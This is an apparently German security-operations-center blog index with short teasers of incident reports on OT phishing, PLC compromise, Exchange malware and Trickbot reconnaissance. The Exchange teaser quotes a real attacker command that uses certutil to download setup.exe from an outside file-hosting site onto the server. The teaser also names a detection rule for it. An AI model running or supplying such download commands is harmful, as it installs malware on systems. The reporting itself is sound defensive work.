Certified Security Operations Center GmbH

Alarmierende Zahlen: Veraltete Betriebssysteme in 65 Prozent aller Produktionsumgebungen

Laut einer kürzlich veröffentlichten Studie, welche das Security-Unternehmen Trend Micro in Auftrag gegeben hat, kommen in 65 Prozent der Produktionsumgebungen veraltete Betriebssysteme zum Einsatz – in Anbetracht des erheblichen Sicherheitsrisikos veralteter Systeme eine alarmierende Zahl. Doch warum werden veraltete Betriebssysteme überhaupt noch eingesetzt? In einigen Produktionsumgebungen machen beispielsweise Kompatibilitätsprobleme mit

Weiterlesen »

Sicherheitsvorfall im Bereich OT bei deutschem Hersteller erfolgreich abgewehrt

Bei einem unserer jüngsten Kundenfälle wurde ein führender deutscher Hersteller Opfer einer Spear-Phishing-Kampagne im Bereich der Operational Technology (OT). Dabei gab sich der Angreifer als Lieferant des Unternehmens aus und verschickte eine legitime E-Mail mit bösartigem Anhang. Beim Öffnen des Anhangs führte sich ein Skript selbständig aus, welches dem Angreifer

Weiterlesen »

OT-Security Hack: Schwachstelle in Industrie-Steuerungscomputer (PLC) führt zu Cyberangriff

In einem unserer jüngsten Kundenfälle wurden die OT-Systeme eines deutschen Unternehmens von Hackern angegriffen und kompromittiert. Die Angreifer nutzten dafür eine Schwachstelle in einem industriellen Steuerungscomputer (PLC) aus, um Zugriff auf die OT-Systeme zu erlangen und diese zu manipulieren. Wir reagierten schnell und instruierten den Kunden, sofort seine Incident-Response-Pläne zu

Weiterlesen »

Sicherheitsvorfall: Schadcode und Datenabfluss auf Kunden-Exchange

Auf dem Exchange-Server eines Kunden haben wir mehrere ungewöhnliche Aktivitäten festgestellt. Dort wurden schädliche Downloads beobachtet und Endpoint Protection Warnungen von „Symantec Network Protection“ ausgelöst. Auch Veränderungen am System, wie die Installation von schädlicher Software mit dem Pfad „C:\setup.exe“ waren ein Resultat unserer Analyse. Doch wie ist es zu diesem

Weiterlesen »

Alarmstufe Rot: Bedrohung durch Malware auf Exchange-Server entdeckt

Die SOC-Experten unserer Leitstelle haben kürzlich folgenden bedrohlichen Vorfall bei einem Kunden entdeckt. Über die Regel „Suspicious Certutil Command“ wurden sie auf den verdächtigen Befehl „C:\Windows\system32\cmd.exe /c certutil.exe -urlcache -f https://temp.sh/OkXnS/setup.exe C:\programdata\setup.exe >> C:\Windows\TEMP\tmpE338.tmp 2>&1” aufmerksam, der auf einem Exchange-Server ausgeführt wurde. Der ausgeführte Befehl enthält den Parameter „-urlcache“, gefolgt

Weiterlesen »

Vorsicht! Trickbot Malware nutzt Nltest.exe zur Netzwerkausspähung

Unsere Sicherheitsanalysten haben kürzlich über eine neu ausgelöste Regel namens „Trickbot Malware Recon Activity“ eine spezielle Aktivität der Trickbot-Malware erkannt. Trickbot bezeichnet im Allgemeinen eine bösartige Software, die sich auf das Ausspähen von Netzwerken und Angriffe auf Banken spezialisiert hat. Dabei nutzt sie verschiedene Techniken, um sich in ein Netzwerk

Weiterlesen »
error: